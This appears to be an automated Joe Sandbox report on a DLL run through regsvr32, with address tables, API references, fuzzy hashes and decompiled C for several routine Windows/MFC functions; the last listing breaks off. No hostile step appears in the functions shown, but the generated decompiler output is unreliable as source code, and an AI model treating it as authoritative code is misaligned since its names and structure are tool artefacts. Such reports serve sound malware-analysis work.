0x00000000
0x1001628a
0x1001628a
0x1001628c
0x1001628e
0x100162e0
0x100162e6
0x100162fa
0x00000000
0x00000000
0x100162fc
0x10016301
0x00000000
0x00000000
0x10016306
0x1001630e
0x1001631d
0x00000000
0x00000000
0x00000000
0x00000000
0x10016328
0x10016328
0x10016328
0x00000000
0x10016328
0x1001632f
0x1001632f
0x10016339
0x1001633e
0x10016342
0x10016342
0x10016347
0x1001634a
0x1001634b
0x100163e2
0x100163ea
0x100163ee
0x100163f1
0x100164fc
0x100164ff
0x10016418
0x10016427
0x10016429
0x1001642b
0x10016436
0x1001643b
0x1001643e
0x10016449
0x1001644e
0x1001644e
0x1001643e
0x1001644f
0x10016458
0x1001645a
0x1001645c
0x10016470
0x10016476
0x1001647a
0x1001647c
0x1001647e
0x1001648f
0x1001648f
0x1001647e
0x10016494
0x00000000
0x10016494
0x10016505
0x10016508
0x100165ad
0x100165b4
0x100165ba
0x100165bf
0x100165c1
0x00000000
0x00000000
0x100165c7
0x100165ca
0x100165cc
0x100165ce
0x100165ce
0x100165e2
0x100165e7
0x100165e9
0x00000000
0x100165ef
0x100165ef
0x100165f3
0x00000000
0x00000000
0x100165fa
0x10016597
0x10016599
0x00000000
0x10016599
0x100165e9
0x1001650e
0x10016511
0x00000000
0x00000000
0x10016517
0x1001651a
0x00000000
0x00000000
0x10016520
0x10016523
0x10016528
0x1001652a
0x1001652b
0x1001653c
0x1001652d
0x1001652d
0x10016530
0x10016532
0x10016532
0x10016541
0x10016543
0x10016545
0x1001655a
0x1001655a
0x1001655c
0x10016561
0x10016563
0x10016571
0x10016575
0x00000000
0x00000000
0x1001657d
0x1001657e
0x1001657f
0x10016580
0x10016582
0x10016587
0x10016588
0x1001658b
0x10016593
0x10016593
0x10016593
0x00000000
0x10016593
0x10016566
0x00000000
0x10016547
0x10016547
0x10016550
0x10016552
0x10016554
0x00000000
0x00000000
0x00000000
0x10016554
0x10016545
0x100163f7
0x00000000
0x00000000
0x100163fd
0x10016400
0x00000000
0x00000000
0x10016406
0x10016409
0x100164a7
0x100164a9
0x00000000
0x00000000
0x100164b1
0x100164b9
0x100164bc
0x100164bf
0x100164c1
0x100164c3
0x100164c5
0x100164c5
0x100164dc
0x100164de
0x100164e0
0x100164e7
0x100164f0
0x100164f6
0x100164f6
0x00000000
0x100164e0
0x1001640f
0x10016412
0x00000000
0x00000000
0x00000000
0x10016412
0x10016351
0x10016351
0x10016353
0x10016384
0x10016387
0x10016387
0x1001638a
0x00000000
0x00000000
0x1001638e
0x10016393
0x1001639a
0x100163a0
0x100163a0
0x100163a4
0x100163a8
0x100163ae
0x100163ae
0x100163b2
0x100163c1
0x100163c6
0x100163c8
0x00000000
0x00000000
0x100163ca
0x100163cd
0x100163cf
0x00000000
0x00000000
0x100163d2
0x100163d4
0x00000000
0x100163d4
0x00000000
0x100163b2
0x100163aa
0x100163ac
0x00000000
0x00000000
0x00000000
0x100163ac
0x1001639c
0x1001639e
0x00000000
0x00000000
0x00000000
0x1001639e
0x10016355
0x10016358
0x00000000
0x00000000
0x1001635e
0x10016361
0x10016374
0x10016374
0x10016377
0x1001637c
0x00000000
0x10016382
0x00000000
0x10016382
0x1001637c
0x10016365
0x1001636b
0x1001636e
0x00000000
0x00000000
0x00000000
0x1001636e
0x10016290
0x10016296
0x100162b7
0x100162bb
0x00000000
0x00000000
0x00000000
0x100162bb
0x100162bf
0x00000000
0x00000000
0x100162c1
0x100162c6
0x00000000
0x00000000
0x100162c8
0x100162cd
0x00000000
0x00000000
0x100162cf
0x100162d2
0x100162d4
0x100162da
0x100163b4
0x100163b6
0x10016496
0x1001649b
0x100164a4
0x100164a4
0x00000000
0x100162da
0x1001628e

APIs

__EH_prolog.LIBCMT ref: 1001621B
GetFocus.USER32 ref: 10016229
GetParent.USER32(?), ref: 1001629F
GetParent.USER32(?), ref: 100162AF
GetKeyState.USER32(00000012), ref: 10016365
IsDialogMessageA.USER32(?,?,00000000,?,?,00000000), ref: 10016421
GetFocus.USER32 ref: 10016433
GetFocus.USER32 ref: 10016440
IsWindow.USER32(?), ref: 10016458
GetFocus.USER32 ref: 10016464
IsWindow.USER32(?), ref: 1001647A
GetFocus.USER32 ref: 10016480
GetKeyState.USER32(00000010), ref: 100164B1
GetNextDlgTabItem.USER32 ref: 100164D0
MessageBeep.USER32 ref: 10016566

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Focus$MessageParentStateWindow$BeepDialogH_prologItemNext
String ID:
API String ID: 1894107442-0
Opcode ID: 486442e8c6bcb0076941939c8bd62ac49a048beda2baaa3eb9fb2662508311b1
Instruction ID: eddeb8bba58c5084ce1cb2c18da9b9d46ce5d423f8bd90ca2aee6db3b04b3a4e
Opcode Fuzzy Hash: 486442e8c6bcb0076941939c8bd62ac49a048beda2baaa3eb9fb2662508311b1
Instruction Fuzzy Hash: 17A1A1359006169BEF51DF64CC85AAE7BA5EF0D390F624029F815AF1A1DB31EDC1C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1003835A Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 114
registryclipboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1003835A(struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
				void* _t32;
				signed int _t34;
				void* _t40;
				int _t49;
				signed int _t58;
				intOrPtr _t63;
				void* _t64;
				intOrPtr* _t65;

				if(_a4 == 0) {
					L19:
					return 0;
				}
				_t64 = E100655E1(0x10094918, E10062AFA);
				_t54 =  *(_t64 + 0x18);
				if( *(_t64 + 0x18) != 0) {
					E10044F7B(_t54, _a4);
					 *(_t64 + 0x18) =  *(_t64 + 0x18) & 0x00000000;
				}
				_t63 = _a8;
				if(_t63 != 0x110) {
					__eflags = _t63 -  *0x10094f1c; // 0x0
					if(__eflags == 0) {
						L22:
						SendMessageA(_a4, 0x111, 0xe146, 0);
						_t32 = 1;
						return _t32;
					}
					__eflags = _t63 - 0x111;
					if(_t63 != 0x111) {
						L8:
						__eflags = _t63 - 0xc000;
						if(_t63 < 0xc000) {
							goto L19;
						}
						_push(_a4);
						_t65 = E10041F9F();
						_t34 = E10046B9B(_t65, 0x1007f888);
						__eflags = _t34;
						if(_t34 == 0) {
							L11:
							__eflags = _t63 -  *0x10094f28; // 0x0
							if(__eflags != 0) {
								__eflags = _t63 -  *0x10094f24; // 0x0
								if(__eflags != 0) {
									__eflags = _t63 -  *0x10094f2c; // 0x0
									if(__eflags != 0) {
										__eflags = _t63 -  *0x10094f20; // 0x0
										if(__eflags != 0) {
											goto L19;
										}
										return  *((intOrPtr*)( *_t65 + 0xd0))();
									}
									_t58 = _a16 >> 0x10;
									__eflags = _t58;
									 *((intOrPtr*)( *_t65 + 0xd8))(_a12, _a16 & 0x0000ffff, _t58);
									goto L19;
								}
								__eflags =  *0x10094b74;
								if( *0x10094b74 != 0) {
									 *(_t65 + 0x1f4) = _a16;
								}
								_t40 =  *((intOrPtr*)( *_t65 + 0xd4))();
								 *(_t65 + 0x1f4) =  *(_t65 + 0x1f4) & 0x00000000;
								return _t40;
							}
							return  *((intOrPtr*)( *_t65 + 0xd0))(_a16);
						}
						__eflags =  *(_t65 + 0x92) & 0x00000008;
						if(( *(_t65 + 0x92) & 0x00000008) != 0) {
							goto L19;
						}
						goto L11;
					}
					__eflags = _a12 - 0x40e;
					if(_a12 == 0x40e) {
						goto L22;
					}
					goto L8;
				} else {
					 *0x10094f2c = RegisterClipboardFormatA("commdlg_LBSelChangedNotify");
					 *0x10094f28 = RegisterClipboardFormatA("commdlg_ShareViolation");
					 *0x10094f24 = RegisterClipboardFormatA("commdlg_FileNameOK");
					 *0x10094f20 = RegisterClipboardFormatA("commdlg_ColorOK");
					 *0x10094f1c = RegisterClipboardFormatA("commdlg_help");
					_t49 = RegisterClipboardFormatA("commdlg_SetRGBColor");
					_push(_a16);
					 *0x10094f18 = _t49;
					_push(_a12);
					return E10040FF8(_t54, _a4, 0x110);
				}
			}

0x10038364
0x100384b1
0x00000000
0x100384b1
0x10038379
0x1003837b
0x10038380
0x10038385
0x1003838a
0x1003838a
0x1003838e
0x10038398
0x100383fc
0x10038407
0x100384c9
0x100384d4
0x100384dc
0x00000000
0x100384dc
0x1003840d
0x1003840f
0x1003841d
0x1003841d
0x10038423
0x00000000
0x00000000
0x10038429
0x10038431
0x1003843a
0x1003843f
0x10038441
0x1003844c
0x1003844c
0x10038452
0x10038463
0x10038469
0x10038490
0x10038496
0x100384b5
0x100384bb
0x00000000
0x00000000
0x00000000
0x100384c1
0x1003849d
0x1003849d
0x100384ab
0x00000000
0x100384ab
0x1003846b
0x10038472
0x10038477
0x10038477
0x10038481
0x10038487
0x00000000
0x10038487
0x00000000
0x1003845b
0x10038443
0x1003844a
0x00000000
0x00000000
0x00000000
0x1003844a
0x10038411
0x10038417
0x00000000
0x00000000
0x00000000
0x1003839a
0x100383ac
0x100383b8
0x100383c4
0x100383d0
0x100383dc
0x100383e1
0x100383e3
0x100383e6
0x100383eb
0x00000000
0x100383f2

APIs

Part of subcall function 100655E1: TlsGetValue.KERNEL32 ref: 10065620

RegisterClipboardFormatA.USER32(commdlg_LBSelChangedNotify), ref: 100383A5
RegisterClipboardFormatA.USER32(commdlg_ShareViolation), ref: 100383B1
RegisterClipboardFormatA.USER32(commdlg_FileNameOK), ref: 100383BD
RegisterClipboardFormatA.USER32(commdlg_ColorOK), ref: 100383C9
RegisterClipboardFormatA.USER32(commdlg_help), ref: 100383D5
RegisterClipboardFormatA.USER32(commdlg_SetRGBColor), ref: 100383E1

Part of subcall function 10044F7B: SetWindowLongA.USER32(?,000000FC,00000000), ref: 10044FAA

SendMessageA.USER32 ref: 100384D4

Strings

commdlg_ShareViolation, xrefs: 100383A7
commdlg_ColorOK, xrefs: 100383BF
commdlg_FileNameOK, xrefs: 100383B3
commdlg_LBSelChangedNotify, xrefs: 100383A0
commdlg_SetRGBColor, xrefs: 100383D7
commdlg_help, xrefs: 100383CB

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ClipboardFormatRegister$LongMessageSendValueWindow
String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
API String ID: 3913284445-3888057576
Opcode ID: 8a8886a2d35e23467250dcf3aeb74c64e64130a3b64b9075c73c9bca74aa73bb
Instruction ID: 9720bdbc54395201d480a28582d55e7385908a8a95ea8467eab2354cc1dfd3e0
Opcode Fuzzy Hash: 8a8886a2d35e23467250dcf3aeb74c64e64130a3b64b9075c73c9bca74aa73bb
Instruction Fuzzy Hash: 8B41B631600216DFDB26DF64CC94BAE3BE1FB08392F02446AF9499B661CB749940CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1002B400 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 44
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002B400() {
				char _v12;
				void* _t5;
				int _t12;

				if( *0x10097825 != 0) {
					EnterCriticalSection(0x10096ac0);
					 *0x10097824 = 0x1e;
					GetProfileStringA("windows", "kanjimenu", "roman",  &_v12, 9);
					if(lstrcmpiA( &_v12, "kanji") == 0) {
						 *0x10097824 = 0x1f;
					}
					GetProfileStringA("windows", "hangeulmenu", "english",  &_v12, 9);
					_t12 = lstrcmpiA( &_v12, "hangeul");
					if(_t12 == 0) {
						 *0x10097824 = 0x1f;
					}
					LeaveCriticalSection(0x10096ac0);
					return _t12;
				}
				return _t5;
			}

0x1002b40c
0x1002b417
0x1002b42a
0x1002b440
0x1002b456
0x1002b458
0x1002b458
0x1002b475
0x1002b481
0x1002b485
0x1002b487
0x1002b487
0x1002b493
0x00000000
0x1002b493
0x1002b49e

APIs

EnterCriticalSection.KERNEL32(10096AC0,75427D2F,7557050E,?,?,?,?,?,?,?,?,?,?,?,?,1002A957), ref: 1002B417
GetProfileStringA.KERNEL32 ref: 1002B440
lstrcmpiA.KERNEL32(?,kanji,?,?,?,?,?,?,?,?,?,?,?,?,1002A957), ref: 1002B452
GetProfileStringA.KERNEL32 ref: 1002B475
lstrcmpiA.KERNEL32(?,hangeul,?,?,?,?,?,?,?,?,?,?,?,?,1002A957), ref: 1002B481
LeaveCriticalSection.KERNEL32(10096AC0,?,?,?,?,?,?,?,?,?,?,?,?,1002A957), ref: 1002B493

Strings

hangeul, xrefs: 1002B47B
kanji, xrefs: 1002B446
kanjimenu, xrefs: 1002B436
english, xrefs: 1002B466
roman, xrefs: 1002B431
windows, xrefs: 1002B43B, 1002B470
hangeulmenu, xrefs: 1002B46B

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalProfileSectionStringlstrcmpi$EnterLeave
String ID: english$hangeul$hangeulmenu$kanji$kanjimenu$roman$windows
API String ID: 1105401458-111014456
Opcode ID: 65bf7b965a4c77a43e522551dedb7cae505db4fb3ab319671288e4202f62596b
Instruction ID: 79e4cf8158d1ccfd38176642440db65f2916bd5c4dc3eafc5c19c764cc581e95
Opcode Fuzzy Hash: 65bf7b965a4c77a43e522551dedb7cae505db4fb3ab319671288e4202f62596b
Instruction Fuzzy Hash: 9701A276044266BAE208F328DC88FC73BD8F788384F050056F74CA2027E7225508DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1002A3B0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 83
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002A3B0(struct HWND__* _a4, long _a8) {
				char _v16;
				void* _t7;
				struct HWND__* _t29;

				_t29 = _a4;
				_t7 = GetPropA(_t29, 0);
				if(_t7 == 0) {
					_t7 = GetPropA(_t29, 0);
					if(_t7 == 0) {
						_t7 = GetPropA(_t29, 0);
						if(_t7 == 0) {
							_t7 = GetPropA(_t29, 0);
							if(_t7 == 0) {
								_t7 = GetPropA(_t29, 0);
								if(_t7 == 0) {
									_t7 = GetPropA(_t29, 0);
									if(_t7 == 0) {
										_t7 = E1002A340(_t29);
										if(_t7 == 0) {
											if( *0x10097825 != 0 && IsWindowUnicode(_t29) == 0) {
												GetClassNameA(_t29,  &_v16, 0x10);
												lstrcmpiA( &_v16, "edit");
											}
											return SetPropA(_t29, 0, SetWindowLongA(_t29, 0xfffffffc, _a8));
										}
									}
								}
							}
						}
					}
				}
				return _t7;
			}

0x1002a3bc
0x1002a3c9
0x1002a3cd
0x1002a3dd
0x1002a3e1
0x1002a3f1
0x1002a3f5
0x1002a405
0x1002a409
0x1002a419
0x1002a41d
0x1002a429
0x1002a42d
0x1002a430
0x1002a43a
0x1002a443
0x1002a458
0x1002a468
0x1002a46e
0x00000000
0x1002a489
0x1002a43a
0x1002a42d
0x1002a41d
0x1002a409
0x1002a3f5
0x1002a3e1
0x1002a494

APIs

GetPropA.USER32(?,00000000), ref: 1002A3C9
GetPropA.USER32(?,00000000), ref: 1002A3DD
GetPropA.USER32(?,00000000), ref: 1002A3F1
GetPropA.USER32(?,00000000), ref: 1002A405
GetPropA.USER32(?,00000000), ref: 1002A419
GetPropA.USER32(?,00000000), ref: 1002A429
IsWindowUnicode.USER32(?), ref: 1002A446
GetClassNameA.USER32(?,?,00000010), ref: 1002A458
lstrcmpiA.KERNEL32(?,edit), ref: 1002A468
SetWindowLongA.USER32(?,000000FC,?), ref: 1002A478
SetPropA.USER32(?,00000000,00000000), ref: 1002A489

Strings

edit, xrefs: 1002A462

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Prop$Window$ClassLongNameUnicodelstrcmpi
String ID: edit
API String ID: 4088303749-2167791130
Opcode ID: f1145025d173548d6db32f6da75234ae2c38d8a152e03d95b98c679bca357bb5
Instruction ID: 35dc1012aa98b208e37a2214baeda16235f86b7ec39a9e1fc066622857c1f352
Opcode Fuzzy Hash: f1145025d173548d6db32f6da75234ae2c38d8a152e03d95b98c679bca357bb5
Instruction Fuzzy Hash: D42162666021676EF345B7389C44EBB27DCFF8E5847410512FA28C1110FB29D982C779

Uniqueness

Uniqueness Score: -1.00%

Function 100168BA Relevance: 19.7, APIs: 13, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E100168BA() {
				intOrPtr _t64;
				signed int _t65;
				signed int _t66;
				signed int _t68;
				signed int _t75;
				void* _t82;
				intOrPtr _t93;
				intOrPtr _t96;
				void* _t102;
				signed int _t110;
				signed int _t112;
				intOrPtr _t124;
				signed int _t137;
				intOrPtr* _t140;
				intOrPtr* _t141;
				intOrPtr* _t144;
				intOrPtr* _t145;
				signed int _t147;
				intOrPtr* _t148;
				void* _t149;
				void* _t151;

				E1001A9E0(0x10077d48, _t149);
				_t64 =  *((intOrPtr*)(_t149 + 8));
				 *((intOrPtr*)(_t149 - 0x10)) = _t151 - 0x34;
				if(_t64 == 0 ||  *((intOrPtr*)(_t149 + 0xc)) == 0) {
					_t65 = 0 | _t64 ==  *((intOrPtr*)(_t149 + 0xc));
				} else {
					_t140 = __imp__#17;
					_t66 =  *_t140(_t64);
					_t110 = _t66;
					 *(_t149 - 0x30) = _t110;
					_t135 =  *_t140( *((intOrPtr*)(_t149 + 0xc)));
					if(_t110 != _t67) {
						L10:
						_t65 = 0;
					} else {
						if(_t110 != 0) {
							_t141 = __imp__#18;
							_t68 =  *_t141( *((intOrPtr*)(_t149 + 8)));
							_push( *((intOrPtr*)(_t149 + 0xc)));
							 *(_t149 - 0x2c) = _t68;
							if( *(_t149 - 0x2c) !=  *_t141()) {
								goto L10;
							} else {
								 *((intOrPtr*)(_t149 - 0x14)) = 0;
								 *((intOrPtr*)(_t149 - 0x18)) = 0;
								 *((intOrPtr*)(_t149 - 0x1c)) = 0;
								 *((intOrPtr*)(_t149 - 0x20)) = 0;
								 *((intOrPtr*)(_t149 - 0x24)) = 0;
								 *((intOrPtr*)(_t149 - 0x28)) = 0;
								 *(_t149 - 4) = 0;
								 *((intOrPtr*)(_t149 - 0x14)) = E10045FEF(_t110 << 2);
								 *((intOrPtr*)(_t149 - 0x18)) = E10045FEF(_t135 << 2);
								 *((intOrPtr*)(_t149 - 0x1c)) = E10045FEF(_t110 << 2);
								 *((intOrPtr*)(_t149 - 0x20)) = E10045FEF(_t135 << 2);
								_t75 = 0;
								_t112 = 1;
								while(_t75 <  *(_t149 - 0x30)) {
									_t147 = _t75 << 2;
									_t124 =  *((intOrPtr*)(_t149 - 0x14)) + _t147;
									_t137 = _t75 + 1;
									 *((intOrPtr*)(_t149 - 0x38)) = _t124;
									__imp__#20( *((intOrPtr*)(_t149 + 8)), _t137, _t124);
									E1001689B(_t149, _t75);
									_t93 =  *((intOrPtr*)(_t149 - 0x18)) + _t147;
									 *((intOrPtr*)(_t149 - 0x3c)) = _t93;
									__imp__#20( *((intOrPtr*)(_t149 + 0xc)), _t137, _t93);
									E1001689B(_t149, _t93);
									_t96 =  *((intOrPtr*)(_t149 - 0x1c)) + _t147;
									 *((intOrPtr*)(_t149 - 0x34)) = _t96;
									__imp__#19( *((intOrPtr*)(_t149 + 8)), _t137, _t96);
									E1001689B(_t149, _t96);
									_t148 = _t147 +  *((intOrPtr*)(_t149 - 0x20));
									__imp__#19( *((intOrPtr*)(_t149 + 0xc)), _t137, _t148);
									E1001689B(_t149,  *((intOrPtr*)(_t149 - 0x20)));
									_t102 =  *((intOrPtr*)( *((intOrPtr*)(_t149 - 0x34)))) -  *((intOrPtr*)( *((intOrPtr*)(_t149 - 0x38))));
									if(_t102 ==  *_t148 -  *((intOrPtr*)( *((intOrPtr*)(_t149 - 0x3c))))) {
										_t112 = _t112 * (_t102 + 1);
										_t75 = _t137;
										continue;
									} else {
										E10046018( *((intOrPtr*)(_t149 - 0x14)));
										E10046018( *((intOrPtr*)(_t149 - 0x18)));
										E10046018( *((intOrPtr*)(_t149 - 0x1c)));
										E10046018( *((intOrPtr*)(_t149 - 0x20)));
										goto L10;
									}
									goto L14;
								}
								_t144 = __imp__#23;
								E1001689B(_t149,  *_t144( *((intOrPtr*)(_t149 + 8)), _t149 - 0x24));
								E1001689B(_t149,  *_t144( *((intOrPtr*)(_t149 + 0xc)), _t149 - 0x28));
								_t82 = E1001AA00( *((intOrPtr*)(_t149 - 0x24)),  *((intOrPtr*)(_t149 - 0x28)), _t112 *  *(_t149 - 0x2c));
								_t145 = __imp__#24;
								E1001689B(_t149,  *_t145( *((intOrPtr*)(_t149 + 8))));
								E1001689B(_t149,  *_t145( *((intOrPtr*)(_t149 + 0xc))));
								 *(_t149 - 4) =  *(_t149 - 4) | 0xffffffff;
								E10046018( *((intOrPtr*)(_t149 - 0x14)));
								E10046018( *((intOrPtr*)(_t149 - 0x18)));
								E10046018( *((intOrPtr*)(_t149 - 0x1c)));
								E10046018( *((intOrPtr*)(_t149 - 0x20)));
								_t65 = 0 | _t82 == 0x00000000;
							}
						} else {
							_t65 = 1;
						}
					}
				}
				L14:
				 *[fs:0x0] =  *((intOrPtr*)(_t149 - 0xc));
				return _t65;
			}

0x100168bf
0x100168c7
0x100168cf
0x100168d2
0x10016b13
0x100168e2
0x100168e2
0x100168e9
0x100168ee
0x100168f0
0x100168f5
0x100168f9
0x10016a1e
0x10016a1e
0x100168ff
0x10016901
0x1001690e
0x10016914
0x10016916
0x10016919
0x10016921
0x00000000
0x10016927
